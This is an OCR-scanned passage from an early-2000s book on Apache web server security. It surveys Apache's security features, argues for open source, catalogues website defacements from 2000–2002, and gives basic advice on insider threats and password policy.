Although Apache's development team is highly skilled, this doesn’t mean that Apache is (or 


ever was) impenetrable. As evidenced by entries in Appendix B, “Apache Security Advisories 
and Bugs,” Apache, like any network application, has a significant security history. 





Apache Security Facilities 


Apache’s security facilities account not merely for HTTP’s inherent insecurity, but 
even for some of the insecurities in operating systems on which Apache runs. These 
facilities—either natively embedded or obtainable through third-party Apache 
modules—deal with the following: 


e Accounting and logging—Web servers without security support lack a funda- 
mental characteristic: They cannot preserve evidence of an attack. To counter 
this, Apache provides extensive logging facilities that enable you to customize 
how and what the server logs. 


e Anonymous user support—Apache supports anonymous users, a useful func- 
tion if you designate portions of your site as public-access areas. Rather than 
create username and password pairs for every Jane Doe that happens by, you 
can simply designate an “Anonymous” login that all visitors can use. 
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CGI security—HTTP runs by default on port 80, a registered port accessible 
only by root. In antiquity, this posed a security issue. CGI programs (search 
engines, for example) could inherit all-encompassing permissions if attackers 
could crack them. To address this, Apache ships with CGI security features that 
enable you to specify under what user ID CGI programs run, and what permis- 
sions they’ll inherit from. 


Denial-of-service attacks—Brutish, uncomplicated denial-of-service attacks are 
actions that any idiot can undertake. One such attack is elementary: Try to 
consume enough memory, namespace, or bandwidth to bring the server down. 
To handle this issue, Apache offers facilities that enable you to control how 
large HTTP client requests can be, and even how much bandwidth a particular 
user or client address can eat. 


Encrypted sessions—Bare HTTP doesn’t armor client/server transmissions 
against electronic eavesdropping. Therefore, well-placed spying tools can 
capture sensitive data that users pass to your server (and vice-versa). To address 
this, Apache supports Secure Sockets Layer and a host of other ciphers. These 
guarantee that even if attackers do capture session transmissions, they’ll reap 
little for their efforts. Well-encrypted data is exceedingly difficult to unravel. 


File and directory access control—Apache provides means to control what files, 
directories, and resources remote clients can obtain. Apache’s control here is 
incisive, too, enabling you to protect directories and subdirectories in a nested 
fashion (applying different controls at different levels of your hierarchical 
directory tree structure). 


HTTP methods—Various HTTP methods permit remote clients to access, 
manipulate, or alter server-owned data. This has security implications. To 
account for this, Apache offers granular control of HTTP request methods 
CONNECT, COPY, DELETE, GET, HEAD, LINK, LOCK, MKCOL, MOVE, OPTIONS, PATCH, POST, 
PROPFIND, PROPPATCH, PUT, TRACE, UNLINK, and UNLOCK. 


Network access control—Web services are publicly accessible. As such, unless 
you take steps to ensure otherwise, anyone from anywhere can engage your 
server and issue document requests. To account for this, Apache offers several 
network access control features. These enable you to specify Allow/Deny rules 
that restrict who, what addresses, what hosts, and what networks can access 
your server’s directory structure. 


Proxy control—Proxy-based systems and proxy chains can often reveal sensi- 
tive data, such as your server’s configuration. This is highly undesirable, 
because it allows attackers to gather valuable intelligence. To account for this, 
Apache ships with features to control what data clients can glean from your 
proxies, or a proxy chain to which your server belongs. 
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e User authentication—Apache provides facilities to handle user authentication, 
and enables you to allow access to one user and deny access to another. 
Furthermore, Apache offers not merely basic or database-driven authentication, 
it supports digest algorithm authentication. 


e User tracking—HTTP is a stateless protocol, and thus cannot provide user 
session management. This bars you from offering customized services to users, 
or the ability to track their activity. To account for this, Apache provides facili- 
ties to track users through cookies. 


In sum, Apache offers extensive security facilities, and throughout the book we'll 
cover each in turn. Before we start, however, I’ll address one Apache security feature 
that overshadows the rest. 


Apache Web Server, Security, and Open Source 


Apache Web Server is an open source application. That is, although you can down- 
load ready-to-run Apache binary distributions (the kind that often ship on book CD- 
ROMs) you can also obtain Apache’s source code. This has important security 
advantages. 


If you’ve used the Internet for any length of time—and you clearly have, or you 
wouldn’t have purchased, borrowed, or stolen this book—you’ve heard the argu- 
ment. Some folks contend that open source lends to greater security while others 
disagree. The dispute is nearly as old and acrimonious as classical arguments in the 
operating system wars. 


However, the open source advocacy argument arises not from passion or bias, but 
common sense. Ask yourself this: how many programs do you use daily? Of these, 
how many are open source? Finally, how do you know that the remaining applica- 
tions you use (for which you have no source) don’t have governmental or corporate 
backdoors? The answer: you don’t. 


At first glance, these statements seem paranoid. However, here’s a fact: Business and 
government are inherently non-altruistic fields. 


Corporations, in particular, crave data. They want to know everything about you— 
what sites you surf, what operating system you use, your demographics, your spend- 
ing habits, and whether you’ve pirated their software. In short, they want to watch 
your every move online, and whenever possible, they want to access your system 
remotely. 


NOTE 


Countless examples of such intrusive and surreptitious tracking exist, most recently the cases 
of LimeWire, Grokster, and KaZaA. (See this link for more information: 
http: //www.salon.com/tech/feature/2001/08/02/parasite_capital/print.html.) 
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True, software vendors package their intrusive curiosity in a friendly box. Some 
insist, for example, that your “computing experience” will be ever-so-much-better if 
you'd only allow them to repair your system from remote locations. But you 
wouldn’t allow these jokers into your home while you're at work, would you? No. So 
why give them a key to your computer? 


Open source programs like Apache offer superior security because you can see—with 
your own eyes—their innermost workings. Indeed, you can examine every last line 
of code and determine whether backdoors exist. Moreover, you can verify just how 
well Apache’s developers did their jobs. 


Casual users argue that these points are irrelevant because to realize significant gains 
from open source, you must first understand source code. Is this true? Partly. 
However, as a Webmaster, you’re not a casual user, and can’t afford to be. Chances 
are, shortly after you established your site you began storing not only your data, but 
also data owned by others. As such, you now have certain responsibilities. One is to 
ensure that your Web site doesn’t get cracked. 


If I’ve unnerved you with these comments, breathe easy. It’s not necessary that you 
become a master C programmer to run an Apache site, and that’s the real beauty of 
open source. Because Apache’s source is open, master C programmers worldwide can 
examine its code daily and pick through loops, buffers, and other constructs, looking 
for holes. Thus, even though you may not today holistically understand Apache’s 
code, you still gain security benefits. Other folks who are master C programmers are 
doing your research for you, even as you read this. 


However, open source advantages don’t end there. Programmers worldwide don’t 
merely audit and discuss Apache’s code; they also endeavor to extend Apache’s func- 
tionality. 


Apache Extensibility 


Ask ten different programmers to define the term extensibility and you might receive 
varied answers. For our purposes, however, extensibility is merely this: a quality that 
and the degree to which a program can adopt or incorporate features or characteris- 
tics at some future date that it didn’t previously have. 


Some programs or commands aren’t extensible and needn’t be. Consider, for 
example, directory navigation commands such as cd and chdir. These commands 
are as old as operating systems and perform a limited task: They enable you to navi- 
gate your file system. To demand that their developers make these tools extensible is 
unreasonable. Such tools fulfill their intended purpose, which has a narrow scope. 
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However, applications that interface or collaborate with other tools, or protocols that 
are likely to evolve technologically over time should be extensible, for several 
reasons: 


e Competition—Competition in the computer industry is fierce. Applications 
that are extensible survive and prosper, while applications that aren’t, don’t (or 
become marginalized). 


e Societal benefit—A non-extensible application is, for average users, a dead-end 
street. Users today crave new features and a high degree of customization. 
Extensible applications invite such users to exercise skill and imagination to 
create new and useful tools that benefit the Internet community at large. 


e Stability—Enterprises often base their commerce on a specific application set, 
and invest considerable money in the process. These enterprises can suffer 
substantial losses if their system suddenly becomes obsolete in the face of new 
technology. 


Apache has long been extensible, and as such has kept astride of most Web-oriented 
technological advances (for example, XML). It thus satisfies competitive, societal, 
and stability issues and provides an ever-increasing array of security facilities. Apache 
owes this flexibility to its inherently modular design. Let’s briefly review that, too. 


Apache’s Modular Design and the Apache API 


Modular design is yet another term that, depending on who you ask, has different 
meanings. For our purposes, however, the term denotes characteristics of a system 
that can include or incorporate separate or disparate parts into its overall construc- 
tion, like building blocks. Such separate or distinct parts are modules. 


To grasp this, think of your favorite word processor and substitute the word modules 
for templates. Microsoft Word and WordPerfect both offer many templates, including 
those that generate legal pleadings. Legal pleadings are notoriously complicated 
documents that bear many distinct and curious characteristics that courts require. 
Word or WordPerfect templates “plug into” their parent applications and seamlessly 
incorporate legal pleading formatting and functionality into those parent applica- 
tions that wasn’t previously available. 


Apache’s modular design affects security in several ways: 


e Apache’s source and Application Programming Interface (API) are both open to 
public examination. This means that the Apache team provided developers 
worldwide with tools and knowledge to develop Apache modules at will. As a 
result, programmers familiar with emerging and exotic encryption algorithms 
can, at any time, develop Apache modules that deploy such encryption. 
Therefore, Apache’s future security facilities and options are confined only by 
the imaginations of independent Apache developers. 
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e Apache’s modular design enables Webmasters to discriminately pick and 
choose which security features they want or need. Because modules are inde- 
pendent entities—entities that Apache is neither tied to nor needs to operate 
effectively—Webmasters needn’t accept unwanted, irrelevant, or extraneous 
modular components. Instead, they can include only those modules that 
provide services critical to their enterprise. 


e Apache’s modular design offers rapid, decentralized deployment and response. 
For example, suppose that an Apache security module you're using proves 
vulnerable to attack. You can instantly (or very near instantly) disable that 
module’s support. And, typically, within a week or so, that module’s author will 
issue a fix or a patched version. Conversely, when new modules emerge that 
offer desirable services, you can plug them in with minimal effort. To under- 
stand how valuable this is, contrast this against Apache’s strongest competitor, 
Microsoft’s IIS. IIS is a centralized application, maintained by a single entity. It 
therefore not only evolves on a slower development curve, but also offers 
comparatively limited flexibility. And because new attack methodologies (and 
new security technologies) emerge daily, flexibility, rapid deployment, and 
turnaround are all essential issues. 


For all these reasons, Apache is an excellent choice. However, it’s not all wine and 
roses. Indeed, the basic arguments against open source tools like Apache still apply. 
To reap all these wonderful benefits, you must first adopt a more advanced mindset 
than that maintained by casual users. 


Casual users conceptualize software tools as programs, static entities that perform 
specific tasks with limited scope. Such users rarely conceptualize such tools as services 
that interact holistically with other applications and their operating systems at large. 
Apache Web Server is such a service, and it can and often does interface with other 
systems and services. This naturally has security implications. 


Furthermore, you'll need to cultivate an outlook wherein security is an ongoing 
process, not an end, and within that framework, things like access control are 
models, not conditions. Before you place your Web server on the freeway—where 
anyone can access it—you’ll need to carefully consider security and access control in 
the larger sense, as concepts and policies with wide implications. 


Finally, you’ll need to cultivate survival skills and a high degree of independence. 
True, plenty of Web sites offer Apache security primers, and by now you probably 
have Ben Laurie’s book and several others on Apache administration. These will 
certainly help. But the bottom line is this: The Apache development team is a busy 
bunch, and they seldom offer extensive technical support to budding Apache admin- 
istrators. Occasionally, you’ll encounter security issues that arise from your specific 
configuration, and as such you'll need to exercise ingenuity and creativity in solving 
them. 
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For these reasons, I wrote this book specifically for folks that are new to Apache. In 
it, I tried to include arcane and recondite situations that you'll encounter in real life. 
By running through these—and demonstrating methodical approaches to solving 
them—I hope to arm you with not merely a dead-end reference, but also a tool that 
trains you to know when, how, and where to look for answers, whether in Apache’s 
configuration, your underlying system, or the Internet itself. 


Having described Apache security facilities, its advantages, and its disadvantages, I 
now offer just a few more words of caution. Apache has excellent security capabili- 
ties, to be sure, but these relate solely to your Web services. Many conditions and 
situations arise for which Apache has no cure. 


Things Apache Can't Defend Against 


As discussed previously, in context with Web services, Apache addresses a staggering 
number of security issues, including accounting, logging, denial-of-service, HTTP 
methods, electronic eavesdropping, proxies, user authentication, and user tracking. 
Indeed, if you serve only static documents from your Apache server, these measures 
alone are nearly enough to chase off all but the most determined crackers. 


However, precious few Webmasters confine their Web-based services to static docu- 
ment storage and retrieval—and why should they? Apache, when coupled with other 
applications, can do extraordinary things, such as serve streamed and multimedia, 
database output, XML, CGI, and a dozen other things, including WAP/WML 
gateway-borne services to handheld devices and cellular telephones. You doubtless 
have similar plans, and it’s important to recognize that the further you venture from 
simple document storage and retrieval, the more danger you potentially encounter. 


Apache cannot account for many variables in environments that support multiple 
services. These include the following: 


e Database issues—Apache may securely interface with this or that database, and 
that’s fine. However, if your preferred database has security issues or vulnerabil- 
ities that have nothing to do with Apache, Apache cannot help. To learn more 
about these issues, see Chapter 5, “Apache, Databases, and Security.” 


e Common Gateway Interface—You’ll doubtless include at least some CGI func- 
tionality on your site. As I related earlier, Apache accounts for CGI security 
issues—at least those that revolve around permissions. This is great news, but 
by no means the end of the story. Bad CGI is bad CGI, and if you or your 
developers fail to observe CGI coding security practices, Apache won’t save the 
day. To learn more, see Chapter 12, “Hacking Secure Code: Apache at Server- 
Side.” 


30 


CHAPTER 1 How Apache Handles Security 


e Environmental issues—Apache’s code assumes that you’ve configured your 
underlying system properly and securely. If you haven’t, Apache’s raw power 
can then turn against you and offer crackers innumerable possibilities. To learn 
more, see Chapter 4, “Environmental Hazards: Apache and Your Operating 
System.” 


e Inside jobs—More than 60% of all intrusions today stem from insiders, 
disgruntled employees, or other individuals to whom you entrust administra- 
tive privileges. Therefore, observing standard security polices (such as locking 
out fired developers) is paramount. Learn more in Chapter 2, “The Risks: 
Cracking Apache.” 


e Third-party tools—Third-party modules—security related or otherwise—can 
sometimes harbor hidden or latent holes. Naturally, you’ll want to enhance 
your Apache server’s functionality, but in doing so, choose modules wisely. If 
you compile in, bind, or load a flawed module to Apache, Apache core and 
security facilities won’t save the day. Learn more in Appendix B, “Apache 
Security Advisories and Bugs.” 


e Personal diligence—Crackers are busy folks, and find holes in applications 
every day. Therefore, you must constantly keep up to date on the security 
status of your underlying operating system, Apache, and any third-party 
modules you load. Security lists and advisories are invaluable resources in this 
regard, providing that you read them. Learn more in Appendix C, “Apache 
Security Resources.” 


e Network attacks—Apache cannot save your system from attacks that exploit 
network hardware or infrastructures beyond its control. 


This book will cover each of these issues in detail—and provide examples of how 
these external forces can undermine Apache’s security model. 


Summary 


Apache has numerous and powerful security features. These features, when acting in 
concert with your operating system’s native security features, provide top-notch 
protection against crackers. In subsequent chapters, we’ll go through Apache’s secu- 
rity facilities one by one. First, however, we’ll examine the aforementioned factors 
that Apache cannot control, factors and issues that you must address before you 
debut your Apache Web Server host on a public or private network. Let’s get busy. 
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2 IN THIS CHAPTER 


The Risks: Cracking ‘Wesene oons 
Ap ache e Sobering Statistics to 


Consider 


e How Security Disasters 


Develop 
This chapter covers the risks you'll face as an Apache 


administrator. 


Inherent Risks of Running a Web Server 


Running a Web server—or any Internet information 
server—carries inherent risks. The scenarios run in escalat- 
ing severity: 


e Intruders gain access and nothing more (access being 
simple, unauthorized entry) 


e Intruders do not gain access, but instead deploy mali- 
cious code that causes your server or network to fail, 
hang, reboot, or otherwise manifest an inoperable 
condition 


e Intruders gain unauthorized access and destroy, 
corrupt, or otherwise alter data or deny access to 
privileged users 


e Intruders gain access and seize control of a portion of 
your system (or even your entire network) 


Ask ten administrators what your chances are, and you'll 
get varied responses. Most Webmasters imagine that their 
Web hosts are secure. Some will argue that they use 
OpenBSD and are therefore immune to attack, others will 
swear by their firewalls, and still others will contend that 
their homegrown solutions are sufficient to ward off 
attack. 
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These assertions all seem hopeful, but don’t rely on them. In the real world, the 
odds are against you. 


Sobering Statistics to Consider 


Hard statistics on security breaches are sobering. A good resource is the Computer 
Security Institute’s Computer Crime and Security Survey, an annual publication, which 
you can obtain online at CSI’s site: http://www. gocsi.com/prelea/000321.html. 


As explained by CSI: 


The Computer Crime and Security Survey is conducted by CSI with the participation of the 
San Francisco Federal Bureau of Investigation’s (FBI) Computer Intrusion Squad. The aim of 
this effort is to raise the level of security awareness, as well as help determine the scope of 
computer crime in the United States. Based on responses from 538 computer security practi- 
tioners in U.S. corporations, government agencies, financial institutions, medical institutions 
and universities, the findings of the “2001 Computer Crime and Security Survey” confirm that 
the threat from computer crime and other information security breaches continues unabated 
and that the financial toll is mounting. 


The 2001 CCSS shows that 85% of respondents experienced break-ins. Of those, 186 
participants willing to disclose their resulting financial losses reported an aggregate 
sum of more than $370,000,000. This amount exceeded Y2K losses by over 
$100,000,000. Seventy percent of all CCSS respondents reported intrusions over their 
Internet-based connections, compared to only 59% in 2000. Finally, 97% reported 
that they maintain Web sites. Clearly, establishing and maintaining a Web server 
exposes you to considerable risk. 


NOTE 


CCSS reports only known security breaches or those that victims report. Many folks, however, 
do not report their security incidents. The figures are therefore likely much higher. 





Worse, trends suggest that even security-oriented sites—sites you’d expect to be 
secure—suffer intrusions regularly. One good example is Secure Root, a high profile, 
well-respected security resource center. Secure Root (http: //secureroot.com/) is an 
all-purpose security site that offers documentation on advisories, attacks, denial-of- 
service attacks, cracking, encryption, and many other security-related issues. 


On Thursday, December 27, 2001, attackers with the group r@0t-access crew 
defaced Secure Root’s site. This shocked the security community, because Secure 
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Root’s owners are security experts. However, that’s not the story’s end—not by a long 
shot. Before the attackers left, they posted an ominous message on the home page: 


Admin: Nothing was bothered...deleted etc...except the logs of course...we have had access 
for over a half a year now giving little hints/tips that u were penetrated...of course nothing 
was done, hopefully this deface has woken you up. btw- your site was cool until you stopped 


updating it. 


If the attackers’ claims have merit, Secure Root operated its business for six months 
without detecting the intrusion. How could this happen? 


NOTE 


To see a mirror of Secure Root’s cracked page, go to 
http://www. safemode.org/mirror/2001/12/26/www.secureroot.com/. 





Sadly, Secure Root is not alone. Consider the case of TASC, a Northrop Grumman 
Corporation subsidiary. TASC proudly reports on its home page 
(http: //www.tasc.com/areas/security/) its excellent security reputation: 


For decades, TASC has been a leading provider of Enterprise Security solutions to national 
security clients, having protected some of the most sensitive information and programs in the 


U.S. government. 


These statements seem encouraging. Look at its client list: 
e Air Force Space Command 
e FAA 
e GSA SAFEGUARD 
e Joint Task Force for Computer Network Defense (JTF-CND) 
e The Air Force Information Warfare Center (AFIWC) 
e The Air Force Space Warfare Center (SWC) 
e The Air Force’s Air Intelligence Agency (AIA) 
e The Army’s Land Information Warfare Activity (LIWA) 


e The Defense Information Systems Agency (DISA) 
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The Department of Transportation 

The Joint Chiefs of Staff 

The National Reconnaissance Office (NRO) 

The National Security Agency (NSA) 

The U.S. Capitol Police 

The Volpe Center, Department of Transportation 


U.S. Space Command 


One could hardly dream up a more prestigious list. Every organization listed controls 
vital national security information of significant military, strategic, or intelligence 
value. How, then, did TASC suffer a critical attack on Wednesday, December 26, 
2001? That morning, a cracker calling himself Crookies seized control of TASC’s 
system to post a birthday greeting for a friend, EvilByte. 


These lessons drive home an important point: No one is immune. Failure to be dili- 
gent can lead to security disasters. 


A few other cases to consider: 


Between December 19 and 22, 2001, attackers seized control of four sites run by 
U.S. Courts (U.S. Bankruptcy Court, Middle District of Georgia; U.S. District 
Court, Northern District of New York; U.S. District Court, District of Vermont; 
and U.S. Bankruptcy Court, PA, Eastern District). The attacker defaced the 
systems out of boredom. Access the defaced sites at 

http: //www.attrition.org/security/commentary/uscourts1.html. 


On December 15, 2001, the MTV Networks Affiliate Sales and Marketing Web 
site fell to “The-Rev of fuxOr Inc.” In the message he left, The Reverend criti- 
cized MTV (which maintains the site) for commercialization of the music video 
industry. He wrote, “MTV started out as a way to express creativity throughout 
the world thru (sic) the magic of music. But today the magic is gone and what 
were (sic) left with is corporations seeking the lowest common denominator.” 
See the defaced page at 

http: //www.safemode.org/mirror/2001/12/08/www.virginrecords.com/ 
mirror.html. 


But those cases were just a glimpse; let’s expand our view. Table 2.1 lists several other 
noteworthy cases. 


TABLE 2.1. 


Victim 
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Noteworthy Cases of Web Servers Hacked or Cracked 


Business and Circumstances 





Bulgaria 


Cuba 


Ecuador 


Egypt 


Ghana 


Guam 


Iran 


Lucent 


This was a top-level domain for the nation Bulgaria (and several domains attached to 
it) that fell on January 31, June 14, July 6, August 26, September 3, September 4, 
September 23, October 21, and November 23, 2000. In one case, the attacker waxed 
pragmatic about computer crime, warning that if you get caught...you get caught. 
See the defaced pages at http: //www.attrition.org/mirror/attrition/bg.html. 
This was a top-level domain for the nation of Cuba (and several connected to it) that 
fell in February 2000. In this case, the attackers compromised 31 index pages in the 
.cu hierarchy, leaving the same message on each: “USA GET OUT HUMAN RIGHTS 
COMMISION!” [sic] 

This was a top-level domain for the nation of Ecuador, which fell on June 16, July 14, 
and September 27, 2000. The attacker, Silver Lords, left an apologetic message 
chiding the system administrator to fix his security, and a lovely anime cell with an 
accompanying anime background. Attrition.org has the defaced version at 

http: //ww.attrition.org/mirror/attrition/2000/12/16/www.apmanta.gov.ec/. 
This was a top-level domain for the nation of Egypt that fell on March 12, April 22, 
and November 10, 2000. The number of pages and domains affected is too many to 
enumerate here. On some, attackers left poetry, on others, artwork. One attacker 
(LinuxLover) left stunning techno-art that fused beautiful women with high-end, 3D 
layering (and offensive messages about Egyptians and Israelis that we cannot print 
here). 

This was a top-level domain for the nation of Ghana that fell on August 14, 2000. 
Here, in one case, the attacker reported that the responsible application and protocol 
was rsh (discussed later in this chapter). How many administrators run rsh on Web 
servers nowadays? Not many—and certainly not the Webmaster at csir.org.gh (not 
anymore, anyway). 

This was a top-level domain for the nation of Guam, which fell on September 10, 
October 8, October 27, November 18, and November 22, 2000. The attacker was 
disdainful and vitriolic, leaving various obscenities and advising the Web master, “No 
security waz [sic] Found Here.. [sic] Just Bugs and security Errors...if you nedd [sic] 
assistance for securing your system e-mail me.” (It’s my hope that the Webmaster did 
reply, and during that exchange, sent the attacker links to dictionary.com and the 
Chicago Manual of Style). 

This was a top-level domain for the nation of Iran that fell on March 9, April 25, 
October 29, November 4, November 8, November 12, November 18, November 19, 
and November 20, 2000. Here, outraged Israeli supporters voiced their discontent by 
hacking 20 pages. On one, they left a background of 24 Israeli flags waving in the 
wind. Atop this, they advised, “THIS SITE HE’S ON 56Kbs MODEM? BUY ISDN OR 
SOMETHING!!!” 

Lucent Technologies’ United Kingdom division at http://www. lucent.co.uk/ fell in 
November 2000. 
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TABLE 2.1. Continued 





Victim Business and Circumstances 

McAfee McAfee’s Brazilian division also fell in November 2000. See it at http://www. attri- 
tion.org/mirror/attrition/2000/11/29/www.mcafee.com.br/. 

Microsoft Microsoft’s Slovenian division was attacked on December 14, 2001. The attacker 


VISA 


ridiculed Microsoft's historical security stance using an old Microsoft policy quote 
popularized by LOpht: “Choose Windows. Choose the Millennium. Choose IIS. 
Choose SQL Server. Choose not to choose...”That vulnerability is completely theoreti- 
cal.” See the original at http://www. attrition.org/mirror/attri- 
tion/2000/12/14/www.microsoft.si/. 

VISA International (this time, in Germany at http://www. visa. de) fell in November 
2000, with the attacker warning to watch out before you buy online because 
“hackers are watching you.” See it at http: //www.attrition.org/mirror/attri- 
tion/2000/11/09/www.visa.de/. 





I know what you’re thinking. These cases were all isolated incidences, chiefly over- 
seas. For example, Microsoft got hacked only in Slovenia, and few Americans can 


point 


to that nation on a map. The big boys at home are still and always will be 


secure, right? Well, here’s a surprise: I’ve been giving you the slow boat to China. 


Microsoft got hacked innumerable times. Here are just a few, choice spots you might 
recognize or visit often: 


arulk.rte.microsoft.com—One of Microsoft’s prime RTE servers, hacked by 
Prime Suspectz on June 21, 2001. 


events.microsoft.com—The Microsoft Events Server, hacked on November 7, 
2000. 


explorer.msn.com—Hacked on July 19, 2001. 


feeds .mobile.msn.com—tThe site from which Microsoft issues feeds, hacked by 
Prime Suspectz on June 21, 2001. 


msrconf .microsoft.com—Hacked on October 24, 1999. 


redsand.rte.microsoft.com—One of Microsoft’s main RTE servers, hacked on 
June 21, 2001. 


streamer.microsoft.com—The site from which Microsoft does streaming, 
hacked on May 7, 2001. 


windowsupdate.microsoft.com—The site from which users pull Windows 
updates, hacked on July 19, 2001. 
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Finally, on the day I wrote this chapter (a Sunday, incidentally), I recorded all attacks 
that occurred prior to 10:37 a.m. It was then that I inserted the information into 
Table 2.2. 


NOTE 


To obtain up-to-the-minute reports on hacks and defacements, go to Alldas at 
http: //www.alldas.org/. 





Table 2.2 shows: 
e The victims’ addresses 
e The attackers’ handles 


e The operating systems on each target 


Remember—Table 2.2 summarizes just a few hours of activity—on a Sunday morning! 
Many sites listed below were still in a defaced state as I wrote this (their administra- 
tors hadn’t yet realized it). 


TABLE 2.2 Early-Morning Attacks, January 27, 2002 





Victim Hacker Operating System 
bumstead.byu.edu null Solaris 
consultweb.com.br haxOrs lab Linux 
e-puntcom.com haxOrs lab Unknown 
falcon.globalweb.co.uk Trippin Smurfs Linux 
kwn.com. tw Digital WrapperZ FreeBSD 
library.ajou.ac.kr Digital WrapperZ HP-UX 
linux.ngi.it ranmakun Unknown 
newark.de.us xb0Ox Windows 
office.byesville.net null BSDI 
recherche.mesfinances.fr BHS Linux 
snark.starnet.fi BHS Linux 
technicalredneck.com haxOrs lab Linux 
www. aboutminsk.net Perfect.Br Linux 
www. australianway.com.au Perfect.Br Windows 
www.bcjcammeray.com.au Perfect.Br Windows 
www.bfact.com AIC Windows 
www.bigdaddys -world.com haxOrs lab OpenBSD 
www.blueskyhost.com HiddenLine Unknown 
www. canadogs . com Crookies Windows 
www.cehcom.univali.br haxOrs lab Linux 
www.cem-corp.co.jp Crookies Linux (Apache) 
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TABLE 2.2 Continued 








Victim Hacker Operating System 
www. ciputra.com MedanHacking Windows 
www.clanding.org val Il Unknown 
www.comdesp.com.br BHS Linux 

www. connect2one.com $4t4n1c_SOuls Windows 
www.coronadotravel.com Crookies Windows 

www. cyber-seniorsusa.com BONZER^JB Linux 

www. das -parlament .de haxOrs lab Linux 

www. dip.co.uk Tyl3r_durden Windows 
www.disparoalacabeza.com haxOrs lab Linux 
www.doctorheller.com Perfect.Br Linux 
www.du.co.kr DarkCode Linux (Apache) 
www.eaml.co.jp TheFugitive Windows 
www.formetco.com TeckLife FreeBSD 
www.hdavidkowal.com xb0Ox ? 
www.hillary.com ANJOS DO Windows 

www. immaginefabio. it LOrd_ByrOn Windows 

www. inenco.net haxOrs lab Linux 

www. joices.hu Darksheep Linux (Apache) 
www. lead.org.pk h2o Windows 

www. Lioninc.org Tyl3r_durden Unknown 

www. lippoinvestments.com HiddenLine Windows 
www.mef.gob.pe nObodies Solaris 
www.mendiaketaherriak.com EVIL ANGELICA Windows 
www.noclueserver.nl Fluffy Bunny FreeBSD 
www.pixdraw.co.kr haxOrs lab Linux 
www.placecn.com haxOrs lab Unknown 
www.plastikero.com.br haxOrs lab Linux 
www.question.fr nerf Unknown 

www. revistaveamas.com anjos Unknown 

www. rpairn.com xb0Ox Linux 

www. sagu . edu Crookies Windows 
www.sepultura.com Web Pirates Linux 

www. southernhosting.com HiddenLine Linux 

www. theheavyweights.com Perfect.Br Windows 
www.thesa.co.kr DarkCode Linux 

www. tozsdekukac.hu Crookies Linux (Apache) 
www.tradertraffic.com Perfect.Br Linux 





Between the time I first began formatting the data and when I finished (about ten 
minutes), eight more sites fell. 


Are you nervous yet? 


How Security Disasters Develop 


How Security Disasters Develop 


As I related earlier, the scenarios you'll face are the following: 
e Intruders gaining simple access 
e Denial of service 


e Defacement or total system seizure 


Let’s run through the factors that invite these situations. 


Intruders Gaining Simple Access 


Simple unauthorized access can happen in several ways: 


e Insiders who once had authorized access (former employees or developers, for 
example) return to haunt you. 


e Your users make bad password choices on other networks that fall to hackers. 
This leads to cross-network unauthorized access. 


e Your underlying operating system has holes, and diligent hackers exploit it to 
gain limited access. 


e The tools you use in conjunction with Apache are flawed. 


Research studies show that some 70% of serious intrusions come from insiders. I 
encounter such cases all the time: 


e In January 2002, a prominent online porn provider contacted me. A former 
developer defected to another firm and took the porn provider’s client list with 
him. He also took username/password databases and was using these, through 
anonymous remailers, to solicit its clients. Adding insult to injury, he also 
broke into my client’s servers. 


e In 2001, I audited a system that offered bullion-backed credit/debit cards. 
Developers who had since quit left behind backdoors to secure remote access 
administrative sections through PHP, with SSL client certificates. 


e In 2000, a defense contractor contacted me. Its skunk works division used a 
centralized password server that housed 4,500 username/password pairs. Of 
users connected to these, more than 800 were no longer with the firm, and of 
these, 42 were still utilizing network resources without authorization—and 
these folks build nuclear weapon components. 


To guard against these situations, when you terminate a user, remove the account. 
Also, preserve all files and directories associated with that user on backup media. 
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(You may later need these for evidence.) And, you’d benefit by installing monitoring 
tools that record user activities. 


Furthermore, in enterprise environments, try to isolate development boxes from 
production boxes. That is, have your developers do their work on test bed systems 
that mirror your production system’s setup. That way, developers never actually have 
access to your enterprise system. A simple code audit prior to moving their work 
over to the enterprise box can then determine whether malicious code exists therein. 


Users and System Security 

As a rule, you shouldn’t let many people access your Web host from the inside. For 
example, Web servers aren’t boxes that you’d normally put shell or Windows user 
accounts on. Rather, you should restrict these machines to Web services alone. That’s 
a given. 


However, you'll still have portions of your Web site that only authorized remote 
users can access, such as areas that house premium Web services for paying 
customers. This always entails passwords, and you can use various approaches for 
this, including simple, native Apache password controls, or database-based password 
access. 


These approaches are fine, but harbor the same inherent weakness: If users create 
their own passwords, those passwords will invariably be weak. So in the end, it 
doesn’t matter what controls you institute. 


Encryption is vital, and there’s no debating that, but even “strong” encryption fails 
when users make poor password choices, and they will. Users are lazy and forgetful. 
To save time and simplify their lives, most users create passwords from the following 
values: 


e Their birth date 
e Their social security number 
e Their children’s names 
e Names of their favorite performing artists 
e Words that appear in a dictionary 
e Numeric sequences (like 90125) 
e Words spelled backwards 
These are terrible choices, and most cracking tools can crack such passwords in 


seconds. In fact, good passwords are difficult to derive, even when you know encryp- 
tion well, for several reasons. 
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First, even your local electronic retail store sells computers with staggering processor 
power. Such machines perform many millions of instructions per second, thus 
providing attackers with the juice to try thousands of character combinations. 


Furthermore, modern dictionary attack tools are advanced. Some, for example, 
employ rules to produce complex character combinations and case variations that 
distort passwords well beyond the limits of the average users’ imagination. Thus, 
even when users get creative with their passwords, cracking tools often prevail. 


Worse still, cross-network password attacks and compromises are common. Suppose 
that your users have Hotmail or AOL accounts (or any account that provides them 
with mail, chat, or other services elsewhere). Ninety percent of users aren’t savvy 
enough to make different passwords for different accounts. Thus, their Hotmail 
accounts have the same username/password pair as their AOL account. 


These conditions invite cross-network password compromise. Suppose that crackers 
expose several thousand Hotmail passwords—this has happened before. Suppose 
further that within that lot, twenty such victims also have accounts on your system. 
Suddenly, attackers have twenty valid username/password pairs from your system. 


This won’t get them far, but it will get them inside your premium service area, which 
probably deploys JSP, ASP, PHP, Perl, Python, ActiveX, or other technologies that 
interact with your database. Attackers can then study that technology and try attacks 
that they couldn’t otherwise try if they had access only to the home page. Over 
time, if there’s a weakness, they’Il find it. 


To ward off such situations as best you can, implement the following controls when- 
ever possible: 


e Set passwords to expire every 60 days, with a 5-day warning and a 1-week 
lockout, if your operating system supports it. 


e Install proactive password checking, enforcing the maximum rules (using at 
least a 100,000-term dictionary). 


e Periodically check user passwords against the largest wordlist you can find. You 
can automate this procedure using Perl on Windows, Unix, and Mac OS X. 


e Watch security lists for new password exploits. 


e Force users to create a new and unique password for each host they have access 
to. Take logs from your proactive password checker that contains passwords 
users previously tried and append these to proactive password checking 
wordlists on other hosts. This way, users’ bad password choices follow them 
across the network. 


e Provide your users with basic education in password security. Even a simple 
Web page explaining what makes a weak password is good. Users will read this 
